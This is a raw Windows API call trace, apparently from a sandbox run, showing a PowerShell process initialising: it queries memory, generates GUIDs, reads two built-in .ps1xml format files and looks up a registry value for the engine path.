	[0395.898] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.898] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xec7a0e0a, Data2=0xc87b, Data3=0x40c7, Data4=([0]=0x87, [1]=0xb8, [2]=0xeb, [3]=0xe2, [4]=0x6, [5]=0x95, [6]=0xd6, [7]=0x44))) returned 0x0
	[0395.898] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xd440a878, Data2=0x5b62, Data3=0x4a06, Data4=([0]=0xb5, [1]=0x99, [2]=0xf2, [3]=0x74, [4]=0x56, [5]=0x7d, [6]=0x23, [7]=0x91))) returned 0x0
	[0395.898] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xfcd1be6c, Data2=0xaf38, Data3=0x43bc, Data4=([0]=0x9f, [1]=0xd2, [2]=0xbd, [3]=0x91, [4]=0xd0, [5]=0x40, [6]=0x42, [7]=0x6f))) returned 0x0
	[0395.898] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xaa6e055a, Data2=0xed52, Data3=0x4543, Data4=([0]=0xb8, [1]=0xf, [2]=0x8a, [3]=0xc2, [4]=0x8d, [5]=0x79, [6]=0x1b, [7]=0x81))) returned 0x0
	[0395.898] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.898] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xbb9a291b, Data2=0xedb4, Data3=0x4fc9, Data4=([0]=0xb0, [1]=0x4d, [2]=0xb2, [3]=0x26, [4]=0x37, [5]=0x2a, [6]=0xc7, [7]=0xfd))) returned 0x0
	[0395.899] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.899] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.899] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.899] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.899] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.899] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xfc54930a, Data2=0x89d1, Data3=0x43fd, Data4=([0]=0x92, [1]=0x5c, [2]=0x1c, [3]=0x37, [4]=0xbb, [5]=0x4f, [6]=0x48, [7]=0xd3))) returned 0x0
	[0395.900] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xd8fd58ee, Data2=0xd962, Data3=0x4234, Data4=([0]=0xb8, [1]=0x2e, [2]=0xa9, [3]=0x2e, [4]=0x4d, [5]=0x97, [6]=0xe5, [7]=0x69))) returned 0x0
	[0395.926] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x74f60eaf, Data2=0x3530, Data3=0x4b90, Data4=([0]=0x9d, [1]=0xbc, [2]=0xfd, [3]=0x23, [4]=0x9f, [5]=0x35, [6]=0xb2, [7]=0x5e))) returned 0x0
	[0395.926] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x8ec08179, Data2=0x6e7d, Data3=0x4413, Data4=([0]=0xaa, [1]=0xdf, [2]=0x57, [3]=0xc2, [4]=0x4b, [5]=0xfe, [6]=0x7, [7]=0x7e))) returned 0x0
	[0395.926] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa5619be5, Data2=0xd27d, Data3=0x4d6b, Data4=([0]=0xb8, [1]=0xb4, [2]=0x2c, [3]=0xf5, [4]=0xda, [5]=0x86, [6]=0x11, [7]=0xc7))) returned 0x0
	[0395.926] VirtualQuery (in: lpAddress=0x16c2e0, lpBuffer=0x16d1a0, dwLength=0x30 | out: lpBuffer=0x16d1a0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xe89f97e, Data2=0x54fc, Data3=0x4500, Data4=([0]=0xae, [1]=0x17, [2]=0x45, [3]=0x22, [4]=0xdf, [5]=0x10, [6]=0x1e, [7]=0x47))) returned 0x0
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xcc3a61db, Data2=0xd82e, Data3=0x4e2c, Data4=([0]=0x82, [1]=0xd6, [2]=0xcd, [3]=0xc4, [4]=0xca, [5]=0x65, [6]=0xf4, [7]=0x69))) returned 0x0
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa2cb1c7, Data2=0x1734, Data3=0x4948, Data4=([0]=0x96, [1]=0xe7, [2]=0xc2, [3]=0x22, [4]=0x2e, [5]=0x30, [6]=0xd1, [7]=0xb7))) returned 0x0
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x311efecb, Data2=0x5322, Data3=0x4f6e, Data4=([0]=0xb5, [1]=0xc8, [2]=0xd, [3]=0x31, [4]=0x14, [5]=0xc6, [6]=0xda, [7]=0xd5))) returned 0x0
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x601d6169, Data2=0x6e24, Data3=0x4ed1, Data4=([0]=0xa3, [1]=0xed, [2]=0xb5, [3]=0xf3, [4]=0x8f, [5]=0xea, [6]=0xea, [7]=0xc2))) returned 0x0
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xe52b4c6c, Data2=0xf3fb, Data3=0x4109, Data4=([0]=0xaf, [1]=0x32, [2]=0xce, [3]=0x48, [4]=0x19, [5]=0x77, [6]=0xae, [7]=0x86))) returned 0x0
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x1877872c, Data2=0x526b, Data3=0x41f2, Data4=([0]=0xb2, [1]=0xac, [2]=0x8f, [3]=0x94, [4]=0xf, [5]=0x11, [6]=0xd6, [7]=0x35))) returned 0x0
	[0395.927] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x72977317, Data2=0x2600, Data3=0x464b, Data4=([0]=0x9b, [1]=0xac, [2]=0x0, [3]=0x75, [4]=0xdb, [5]=0x58, [6]=0x89, [7]=0x7d))) returned 0x0
	[0395.928] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x665f494a, Data2=0xf192, Data3=0x4f2a, Data4=([0]=0x95, [1]=0x7, [2]=0xa6, [3]=0x94, [4]=0x92, [5]=0x4d, [6]=0x47, [7]=0xa0))) returned 0x0
	[0395.928] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x16d8970d, Data2=0x8ff8, Data3=0x4797, Data4=([0]=0xa9, [1]=0x36, [2]=0x1, [3]=0x86, [4]=0x69, [5]=0x65, [6]=0xcd, [7]=0xb6))) returned 0x0
	[0395.928] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xe365ac47, Data2=0xb855, Data3=0x4e75, Data4=([0]=0xb2, [1]=0x2c, [2]=0x88, [3]=0xe9, [4]=0xe6, [5]=0xda, [6]=0x38, [7]=0x5b))) returned 0x0
	[0395.928] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x73e1846f, Data2=0x5455, Data3=0x454b, Data4=([0]=0x8a, [1]=0x63, [2]=0x9a, [3]=0x26, [4]=0x1d, [5]=0x10, [6]=0x2e, [7]=0x17))) returned 0x0
	[0395.928] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x5d721614, Data2=0xcc24, Data3=0x4307, Data4=([0]=0x89, [1]=0xab, [2]=0x29, [3]=0xcd, [4]=0x61, [5]=0x76, [6]=0x6c, [7]=0x78))) returned 0x0
	[0395.928] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x7894ab32, Data2=0xed77, Data3=0x4cda, Data4=([0]=0xa0, [1]=0x0, [2]=0x63, [3]=0xa7, [4]=0x2e, [5]=0xe5, [6]=0x3d, [7]=0x34))) returned 0x0
	[0395.928] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x481b6783, Data2=0x31fd, Data3=0x4aaa, Data4=([0]=0x9a, [1]=0xf6, [2]=0x22, [3]=0x80, [4]=0xd1, [5]=0xf6, [6]=0x14, [7]=0x3b))) returned 0x0
	[0395.929] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa5a7c679, Data2=0x900d, Data3=0x4572, Data4=([0]=0x86, [1]=0xed, [2]=0x2a, [3]=0x37, [4]=0xf2, [5]=0x63, [6]=0x8d, [7]=0x14))) returned 0x0
	[0395.929] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x20bc5692, Data2=0x6596, Data3=0x4d55, Data4=([0]=0xb8, [1]=0x5e, [2]=0xdf, [3]=0x1a, [4]=0x2d, [5]=0x29, [6]=0xe7, [7]=0xa5))) returned 0x0
	[0395.929] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x92efd250, Data2=0x7b93, Data3=0x4eb0, Data4=([0]=0xa6, [1]=0x6a, [2]=0x9c, [3]=0x9a, [4]=0xf7, [5]=0x51, [6]=0x30, [7]=0xbf))) returned 0x0
	[0395.929] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x454f2f1a, Data2=0x4093, Data3=0x4296, Data4=([0]=0xa0, [1]=0xc2, [2]=0x32, [3]=0xa4, [4]=0x5a, [5]=0x3, [6]=0xee, [7]=0xb))) returned 0x0
	[0395.929] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.929] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.930] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.930] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x91d9243f, Data2=0x5480, Data3=0x4c70, Data4=([0]=0x97, [1]=0xd4, [2]=0x58, [3]=0x75, [4]=0xa, [5]=0xb7, [6]=0xdb, [7]=0x73))) returned 0x0
	[0395.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0395.930] SetErrorMode (uMode=0x1) returned 0x1
	[0395.931] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0395.931] GetFileType (hFile=0x2f8) returned 0x1
	[0395.931] SetErrorMode (uMode=0x1) returned 0x1
	[0395.931] GetFileType (hFile=0x2f8) returned 0x1
	[0395.931] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.932] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.932] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.933] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.933] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.933] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.933] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x119, lpOverlapped=0x0) returned 1
	[0395.934] ReadFile (in: hFile=0x2f8, lpBuffer=0x35c77c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x35c77c0*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0395.934] CloseHandle (hObject=0x2f8) returned 1
	[0395.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0395.934] SetErrorMode (uMode=0x1) returned 0x1
	[0395.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0395.934] SetErrorMode (uMode=0x1) returned 0x1
	[0395.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0395.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0395.934] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0395.934] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c40b0
	[0395.934] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c40b0, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0395.934] CoTaskMemFree (pv=0x1b7c40b0) 
	[0395.935] RegCloseKey (hKey=0x2f8) returned 0x0
	[0395.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0395.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0395.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0395.936] VirtualQuery (in: lpAddress=0x16bee0, lpBuffer=0x16cda0, dwLength=0x30 | out: lpBuffer=0x16cda0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.936] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x52bd890a, Data2=0x93d7, Data3=0x48d9, Data4=([0]=0xa7, [1]=0x6e, [2]=0xc1, [3]=0xe1, [4]=0xad, [5]=0x23, [6]=0x3, [7]=0x2f))) returned 0x0
	[0395.937] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.937] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x352d0a50, Data2=0xfb17, Data3=0x462a, Data4=([0]=0x8e, [1]=0xef, [2]=0xc0, [3]=0xdf, [4]=0x15, [5]=0x4b, [6]=0xee, [7]=0x20))) returned 0x0
	[0395.937] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xdf3b08b4, Data2=0xb22c, Data3=0x4bdc, Data4=([0]=0xb2, [1]=0x7f, [2]=0x1b, [3]=0x36, [4]=0xf1, [5]=0x5e, [6]=0x24, [7]=0x7c))) returned 0x0
	[0395.937] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x5707ab12, Data2=0xcc49, Data3=0x4509, Data4=([0]=0xb8, [1]=0xbc, [2]=0x98, [3]=0x3d, [4]=0x6f, [5]=0xa9, [6]=0xba, [7]=0xba))) returned 0x0
	[0395.937] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.937] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0395.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0395.938] SetErrorMode (uMode=0x1) returned 0x1
	[0395.938] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0395.938] GetFileType (hFile=0x2f8) returned 0x1
	[0395.938] SetErrorMode (uMode=0x1) returned 0x1
	[0395.938] GetFileType (hFile=0x2f8) returned 0x1
	[0395.938] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.939] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.940] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.940] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.940] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.941] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.941] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.941] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.941] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.942] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.942] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.942] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.942] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.942] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.943] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0395.943] ReadFile (in: hFile=0x2f8, lpBuffer=0x3623960, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3623960*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
